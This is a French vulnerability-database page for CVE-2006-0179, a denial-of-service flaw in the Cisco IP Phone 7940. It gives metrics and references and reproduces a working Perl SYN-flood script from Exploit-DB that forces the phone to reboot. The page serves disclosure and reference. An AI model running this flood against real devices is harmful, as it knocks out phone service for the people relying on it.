CVE-2006-0179 : Détail

CVE-2006-0179

Overflow
2.25%V3
Network
2006-01-11
20h00 +00:00
2017-10-18
14h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The Cisco IP Phone 7940 allows remote attackers to cause a denial of service (reboot) via a large amount of TCP SYN packets (syn flood) to arbitrary ports, as demonstrated to port 80.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 1411

Date de publication : 2006-01-09 23h00 +00:00
Auteur : kokanin
EDB Vérifié : Yes

#!/usr/bin/perl # This is made for trashing cisco 7940 ip phones. kokanin made/discovered this. # A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my # phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!! # not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny # protocol - this is not for the SIP firmware. use Net::RawIP; use Time::HiRes; $pkt = new Net::RawIP; die "Usage $0 <src> <dst> <target port> <number of pkts> <packet delay>" unless ($ARGV[4]); $pkt->set({ ip => { saddr => $ARGV[0], daddr => $ARGV[1] }, tcp=> { dest => $ARGV[2], syn => 1, seq => 0, ack => 0} }); for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; }; # milw0rm.com [2006-01-10]

Products Mentioned

Configuraton 0

Cisco>>Ip_phone_7940 >> Version *

Références

http://www.osvdb.org/22469
Tags : vdb-entry, x_refsource_OSVDB
http://www.vupen.com/english/advisories/2006/0202
Tags : vdb-entry, x_refsource_VUPEN
http://securitytracker.com/id?1015488
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/18479
Tags : third-party-advisory, x_refsource_SECUNIA
https://www.exploit-db.com/exploits/1411
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/16200
Tags : vdb-entry, x_refsource_BID